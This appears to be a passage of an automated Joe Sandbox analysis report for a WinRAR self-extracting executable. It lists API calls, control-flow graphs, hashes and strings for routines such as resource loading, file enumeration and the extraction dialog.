                                                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0005B73D,00000066), ref: 0005A6D5
                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0005B73D,00000066), ref: 0005A6EC
                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0005B73D,00000066), ref: 0005A703
                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0005B73D,00000066), ref: 0005A712
                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0005B73D,00000066), ref: 0005A72D
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0005A73E
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0005A762
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0005A7C6
                                                                                                                      • Part of subcall function 0005A626: GdipAlloc.GDIPLUS(00000010), ref: 0005A62C
                                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0005A7A7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0005A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                    • String ID: PNG
                                                                                                                    • API String ID: 211097158-364855578
                                                                                                                    • Opcode ID: 1f8b751b52340bdf3349f93d9a0695c4ce967781114969dc6f354157e0828de5
                                                                                                                    • Instruction ID: c8c820e41a44d79fcc5845d3ac5d6051c5e08ea32be558aa3e1640b9ded8296f
                                                                                                                    • Opcode Fuzzy Hash: 1f8b751b52340bdf3349f93d9a0695c4ce967781114969dc6f354157e0828de5
                                                                                                                    • Instruction Fuzzy Hash: 6E319275A04306AFE7109F21DC48D1B7BB9FF89761B000618FD0992621EB39DD49DA61

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1029 4a69b-4a6bf call 5ec50 1032 4a727-4a730 FindNextFileW 1029->1032 1033 4a6c1-4a6ce FindFirstFileW 1029->1033 1034 4a742-4a7ff call 50602 call 4c310 call 515da * 3 1032->1034 1035 4a732-4a740 GetLastError 1032->1035 1033->1034 1036 4a6d0-4a6e2 call 4bb03 1033->1036 1040 4a804-4a811 1034->1040 1037 4a719-4a722 1035->1037 1044 4a6e4-4a6fc FindFirstFileW 1036->1044 1045 4a6fe-4a707 GetLastError 1036->1045 1037->1040 1044->1034 1044->1045 1047 4a717 1045->1047 1048 4a709-4a70c 1045->1048 1047->1037 1048->1047 1050 4a70e-4a711 1048->1050 1050->1047 1052 4a713-4a715 1050->1052 1052->1037
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A6C4
                                                                                                                      • Part of subcall function 0004BB03: _wcslen.LIBCMT ref: 0004BB27
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A6F2
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A6FE
                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A728
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0004A592,000000FF,?,?), ref: 0004A734
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 42610566-0
                                                                                                                    • Opcode ID: 4132412d45861f4f8dedcc7974a093729970d99849e941911a1aac028ad62bb7
                                                                                                                    • Instruction ID: 71c30ff66442eeceeaa668f8dc7fde960c7a37ff222f54dcda2c10d5a9c50513
                                                                                                                    • Opcode Fuzzy Hash: 4132412d45861f4f8dedcc7974a093729970d99849e941911a1aac028ad62bb7
                                                                                                                    • Instruction Fuzzy Hash: 01419FB2A00515ABCB25DF64CC88AEEB7B8FB49350F1441A6F95DE3201D734AE94CF94
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00067DC4,00000000,0007C300,0000000C,00067F1B,00000000,00000002,00000000), ref: 00067E0F
                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00067DC4,00000000,0007C300,0000000C,00067F1B,00000000,00000002,00000000), ref: 00067E16
                                                                                                                    • ExitProcess.KERNEL32 ref: 00067E28
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    • Opcode ID: 8f628433d8b991cce88a9034cec8f98356e295d65f900228956da7e08cd3cca4
                                                                                                                    • Instruction ID: 3284f73f7f9d8bc79a1049435defea18024d81e206cb904d9cb8a72f49b12693
                                                                                                                    • Opcode Fuzzy Hash: 8f628433d8b991cce88a9034cec8f98356e295d65f900228956da7e08cd3cca4
                                                                                                                    • Instruction Fuzzy Hash: B1E04631400148ABEF016F20CD09A8A3FAAEB04345B404464F80D9A132CB3AEE96DA80
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 744d02fbee0f23af05919352a7e3f9dfaeda919a54bc8b22bac60255a28e43d0
                                                                                                                    • Instruction ID: f38fe781fc75f232e2ff383e9e94e506f84cf6294f0f9129367bb0bd0d0f20d3
                                                                                                                    • Opcode Fuzzy Hash: 744d02fbee0f23af05919352a7e3f9dfaeda919a54bc8b22bac60255a28e43d0
                                                                                                                    • Instruction Fuzzy Hash: 3B821AF0904145AEDF65DF64C895BFEBBF9AF05300F0885B9E8499B143DB315A88CB68
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0005B7E5
                                                                                                                      • Part of subcall function 00041316: GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                      • Part of subcall function 00041316: SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005B8D1
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005B8EF
                                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0005B902
                                                                                                                    • TranslateMessage.USER32(?), ref: 0005B910
                                                                                                                    • DispatchMessageW.USER32(?), ref: 0005B91A
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0005B93D
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0005B960
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0005B983
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005B99E
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,000735F4), ref: 0005B9B1
                                                                                                                      • Part of subcall function 0005D453: _wcslen.LIBCMT ref: 0005D47D
                                                                                                                    • SetFocus.USER32(00000000), ref: 0005B9B8
                                                                                                                    • _swprintf.LIBCMT ref: 0005BA24
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                      • Part of subcall function 0005D4D4: GetDlgItem.USER32(00000068,0009FCB8), ref: 0005D4E8
                                                                                                                      • Part of subcall function 0005D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0005AF07,00000001,?,?,0005B7B9,0007506C,0009FCB8,0009FCB8,00001000,00000000,00000000), ref: 0005D510
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005D51B
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,000000C2,00000000,000735F4), ref: 0005D529
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005D53F
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0005D559
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005D59D
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0005D5AB
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005D5BA
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005D5E1
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,000000C2,00000000,000743F4), ref: 0005D5F0
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0005BA68
                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0005BA90
                                                                                                                    • GetTickCount.KERNEL32 ref: 0005BAAE
                                                                                                                    • _swprintf.LIBCMT ref: 0005BAC2
                                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0005BAF4
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0005BB43
                                                                                                                    • _swprintf.LIBCMT ref: 0005BB7C
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0005BBD0
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0005BBEA
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0005BC47
                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0005BC6F
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 0005BCB9
                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0005BCE2
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0005BCEB
                                                                                                                    • _swprintf.LIBCMT ref: 0005BD1E
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005BD7D
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,000735F4), ref: 0005BD94
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0005BD9D
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0005BDAC
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0005BDBB
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005BE68
                                                                                                                    • _wcslen.LIBCMT ref: 0005BEBE
                                                                                                                    • _swprintf.LIBCMT ref: 0005BEE8
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0005BF32
                                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0005BF4C
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0005BF55
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0005BF6B
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0005BF85
                                                                                                                    • SetWindowTextW.USER32(00000000,0008A472), ref: 0005BFA7
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0005C007
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005C01A
                                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0005C0BD
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0005C197
                                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0005C1D9
                                                                                                                      • Part of subcall function 0005C73F: __EH_prolog.LIBCMT ref: 0005C744
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005C1FD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                    • API String ID: 3445078344-2238251102
                                                                                                                    • Opcode ID: 076a42294808c5ae2a5571b78ba8bb619074223133766753f217d60cb11fdaa2
                                                                                                                    • Instruction ID: 9246e0e18081ea8b88bb8b62c65a56ede50674be760ee4115f0ee75ca3fa65cf
                                                                                                                    • Opcode Fuzzy Hash: 076a42294808c5ae2a5571b78ba8bb619074223133766753f217d60cb11fdaa2
                                                                                                                    • Instruction Fuzzy Hash: F842C7B1944649BEFB219B70DD4AFFF77ACAB02701F044055FA45A60D3CBB86A48CB25

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 268 50863-50886 call 5ec50 GetModuleHandleW 271 508e7-50b48 268->271 272 50888-5089f GetProcAddress 268->272 273 50c14-50c40 GetModuleFileNameW call 4c29a call 50602 271->273 274 50b4e-50b59 call 675fb 271->274 275 508a1-508b7 272->275 276 508b9-508c9 GetProcAddress 272->276 290 50c42-50c4e call 4b146 273->290 274->273 285 50b5f-50b8d GetModuleFileNameW CreateFileW 274->285 275->276 279 508e5 276->279 280 508cb-508e0 276->280 279->271 280->279 288 50b8f-50b9b SetFilePointer 285->288 289 50c08-50c0f CloseHandle 285->289 288->289 291 50b9d-50bb9 ReadFile 288->291 289->273 297 50c50-50c5b call 5081b 290->297 298 50c7d-50ca4 call 4c310 GetFileAttributesW 290->298 291->289 294 50bbb-50be0 291->294 296 50bfd-50c06 call 50371 294->296 296->289 305 50be2-50bfc call 5081b 296->305 297->298 307 50c5d-50c7b CompareStringW 297->307 308 50ca6-50caa 298->308 309 50cae 298->309 305->296 307->298 307->308 308->290 310 50cac 308->310 311 50cb0-50cb5 309->311 310->311 313 50cb7 311->313 314 50cec-50cee 311->314 315 50cb9-50ce0 call 4c310 GetFileAttributesW 313->315 316 50cf4-50d0b call 4c2e4 call 4b146 314->316 317 50dfb-50e05 314->317 322 50ce2-50ce6 315->322 323 50cea 315->323 327 50d73-50da6 call 44092 AllocConsole 316->327 328 50d0d-50d6e call 5081b * 2 call 4e617 call 44092 call 4e617 call 5a7e4 316->328 322->315 325 50ce8 322->325 323->314 325->314 333 50df3-50df5 ExitProcess 327->333 334 50da8-50ded GetCurrentProcessId AttachConsole call 63e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 0005087C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0005088E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000508BF
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00050B69
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00050B83
                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00050B93
                                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00073C7C,00000000), ref: 00050BB1
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00050C09
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00050C1E
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00073C7C,?,00000000,?,00000800), ref: 00050C72
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00073C7C,00000800,?,00000000,?,00000800), ref: 00050C9C
                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,00073D44,00000800), ref: 00050CD8
                                                                                                                      • Part of subcall function 0005081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00050836
                                                                                                                      • Part of subcall function 0005081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0004F2D8,Crypt32.dll,00000000,0004F35C,?,?,0004F33E,?,?,?), ref: 00050858
                                                                                                                    • _swprintf.LIBCMT ref: 00050D4A
                                                                                                                    • _swprintf.LIBCMT ref: 00050D96
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                    • AllocConsole.KERNEL32 ref: 00050D9E
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00050DA8
                                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00050DAF
                                                                                                                    • _wcslen.LIBCMT ref: 00050DC4
                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00050DD5
                                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00050DDC
                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00050DE7
                                                                                                                    • FreeConsole.KERNEL32 ref: 00050DED
                                                                                                                    • ExitProcess.KERNEL32 ref: 00050DF5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                    • API String ID: 1207345701-3298887752
                                                                                                                    • Opcode ID: ee74317def21808de3c41358516260c079dea16b748d6be66208fb55918f61af
                                                                                                                    • Instruction ID: e021802cee21d90e57cfe2a28a445723208cbce2336a0cb14d30c0d66f54c40c
                                                                                                                    • Opcode Fuzzy Hash: ee74317def21808de3c41358516260c079dea16b748d6be66208fb55918f61af
                                                                                                                    • Instruction Fuzzy Hash: C2D185B1804384ABE3319F50C849BDFBAE8BB85305F50891DF68D96151CB7C964CDBAB

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 347 5c73f-5c757 call 5eb78 call 5ec50 352 5d40d-5d418 347->352 353 5c75d-5c787 call 5b314 347->353 353->352 356 5c78d-5c792 353->356 357 5c793-5c7a1 356->357 358 5c7a2-5c7b7 call 5af98 357->358 361 5c7b9 358->361 362 5c7bb-5c7d0 call 51fbb 361->362 365 5c7d2-5c7d6 362->365 366 5c7dd-5c7e0 362->366 365->362 367 5c7d8 365->367 368 5c7e6 366->368 369 5d3d9-5d404 call 5b314 366->369 367->369 370 5c7ed-5c7f0 368->370 371 5ca7c-5ca7e 368->371 372 5ca5f-5ca61 368->372 373 5c9be-5c9c0 368->373 369->357 384 5d40a-5d40c 369->384 370->369 377 5c7f6-5c850 call 5a64d call 4bdf3 call 4a544 call 4a67e call 46edb 370->377 371->369 375 5ca84-5ca8b 371->375 372->369 379 5ca67-5ca77 SetWindowTextW 372->379 373->369 376 5c9c6-5c9d2 373->376 375->369 380 5ca91-5caaa 375->380 381 5c9d4-5c9e5 call 67686 376->381 382 5c9e6-5c9eb 376->382 438 5c98f-5c9a4 call 4a5d1 377->438 379->369 385 5cab2-5cac0 call 63e13 380->385 386 5caac 380->386 381->382 389 5c9f5-5ca00 call 5b48e 382->389 390 5c9ed-5c9f3 382->390 384->352 385->369 402 5cac6-5cacf 385->402 386->385 394 5ca05-5ca07 389->394 390->394 399 5ca12-5ca32 call 63e13 call 63e3e 394->399 400 5ca09-5ca10 call 63e13 394->400 421 5ca34-5ca3b 399->421 422 5ca4b-5ca4d 399->422 400->399 406 5cad1-5cad5 402->406 407 5caf8-5cafb 402->407 411 5cad7-5cadf 406->411 412 5cb01-5cb04 406->412 407->412 414 5cbe0-5cbee call 50602 407->414 411->369 417 5cae5-5caf3 call 50602 411->417 419 5cb06-5cb0b 412->419 420 5cb11-5cb2c 412->420 430 5cbf0-5cc04 call 6279b 414->430 417->430 419->414 419->420 433 5cb76-5cb7d 420->433 434 5cb2e-5cb68 420->434 427 5ca42-5ca4a call 67686 421->427 428 5ca3d-5ca3f 421->428 422->369 429 5ca53-5ca5a call 63e2e 422->429 427->422 428->427 429->369 448 5cc06-5cc0a 430->448 449 5cc11-5cc62 call 50602 call 5b1be GetDlgItem SetWindowTextW SendMessageW call 63e49 430->449 440 5cb7f-5cb97 call 63e13 433->440 441 5cbab-5cbce call 63e13 * 2 433->441 469 5cb6c-5cb6e 434->469 470 5cb6a 434->470 455 5c855-5c869 SetFileAttributesW 438->455 456 5c9aa-5c9b9 call 4a55a 438->456 440->441 463 